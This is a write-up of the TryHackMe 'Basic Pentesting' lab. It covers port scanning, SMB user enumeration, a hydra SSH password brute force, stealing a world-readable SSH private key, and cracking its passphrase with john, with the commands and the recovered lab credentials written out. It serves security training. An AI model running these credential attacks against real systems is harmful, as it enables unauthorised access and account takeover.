TryHackMe — Basic Pentesting
TryHackMe — Basic Pentesting
Difficulty: Easy Date: June 29, 2026 Author: Ross Fisher
Overview
Basic Pentesting teaches a realistic engagement workflow — read notes left by developers, extract usernames from SMB, brute force SSH, pivot between users using a stolen SSH key, and crack the passphrase to get in. No fancy exploits. Just enumeration, credential attacks, and following the bread crumbs the box leaves you.
Credentials found:
- jan:armando (SSH brute force)
- kay key passphrase: beeswax
kay’s pass.bak contents: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Recon
Nmap
sudo nmap -sV -sC -p- --min-rate 5000 -Pn 10.144.128.155
Key ports:
- 22 — OpenSSH 8.2p1
- 80 — Apache 2.4.41
- 139/445 — Samba SMB
- 8009 — Apache Jserv AJP13
- 8080 — Apache Tomcat 9.0.7
The -sC flag runs default NSE scripts which immediately pulled SMB signing info and the NetBIOS name BASIC2. Always use -sC when you see SMB open — it saves a separate enumeration step.
Web — /development
Gobuster found /development on port 80:
gobuster dir -u http://10.144.128.155 -w /usr/share/wordlists/dirb/common.txt -t 50
Inside were two developer notes that handed us everything we needed:
Note 1:
- Apache Struts 2.5.12 running (known vulnerable version)
- Written and signed by K
Note 2:
- SMB configured — signed by K
- K audited
/etc/shadowand cracked J’s hash easily - J has a weak password, told to change it
This tells us two things immediately: the usernames are jan and kay, and jan has a weak password in rockyou.
SMB Enumeration — enum4linux
enum4linux -a 10.144.128.155
Confirmed the Unix usernames via RID cycling:
S-1-22-1-1000 Unix User\kay
S-1-22-1-1001 Unix User\jan
S-1-22-1-1002 Unix User\ubuntu
Also found an Anonymous share with read access — worth checking on future engagements even if it was empty here.
Foothold — Brute Forcing jan’s SSH Password
Armed with the username jan and the knowledge that the password is weak:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.144.128.155
Cracked in about 3 minutes:
[22][ssh] host: 10.144.128.155 login: jan password: armando
ssh jan@10.144.128.155
# password: armando
Privilege Escalation — jan to kay
Enumeration as jan
sudo -l
# Sorry, user jan may not run sudo on ip-10-144-128-155.
find / -perm -u=s -type f 2>/dev/null
# Nothing useful — all standard system binaries
Checked kay’s home directory:
ls -la /home/kay/
Found:
pass.bak— no read permission as jan.ssh/directory — readable
ls -la /home/kay/.ssh/
# id_rsa is readable by everyone (permissions: -rw-r--r--)
cat /home/kay/.ssh/id_rsa
Kay’s SSH private key was world-readable. Copied it back to Kali.
Cracking the Key Passphrase
The key header showed Proc-Type: 4,ENCRYPTED — passphrase protected. Used ssh2john to convert it to a crackable format:
ssh2john ~/THM/kay_key > ~/THM/kay_hash.txt
john ~/THM/kay_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Cracked instantly:
beeswax (/home/ross/THM/kay_key)
SSH as kay
chmod 600 ~/THM/kay_key
ssh -i ~/THM/kay_key kay@10.144.128.155
# passphrase: beeswax
cat pass.bak
# heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Attack Chain Summary
Nmap → SMB + HTTP on 80
→ gobuster → /development → dev notes → usernames jan + kay
→ enum4linux → confirmed jan + kay as Unix users
→ hydra SSH brute force → jan:armando
→ SSH as jan
→ /home/kay/.ssh/id_rsa (world-readable)
→ ssh2john + john → passphrase: beeswax
→ SSH as kay → pass.bak
Key Lessons
1. Developer notes are goldmines. The /development directory handed us usernames, a hint that one password is weak, and information about the tech stack. Always read everything on the web server.
2. enum4linux for any box with 139/445 open. It confirmed the exact Unix usernames via null session RID cycling. Minimum password length of 5 from the password policy also told us the password wouldn’t be complex.
3. Check SSH key permissions. Kay’s id_rsa was world-readable (-rw-r--r--). That’s a misconfiguration that gives any local user a path to escalate. Always check /home/*/. ssh/ when you’re on a box as a low-priv user.
4. ssh2john is the tool for passphrase-protected keys. Same workflow as any other john crack — convert to hash format, run against rockyou.
5. File path matters. Spent time debugging because ~/kay_key resolves to /home/ross/kay_key but the file was in ~/THM/kay_key. Always check ls before assuming a file exists where you think it does.
Tools Used
- nmap (-sV -sC)
- gobuster
- enum4linux
- hydra
- ssh
- ssh2john
- john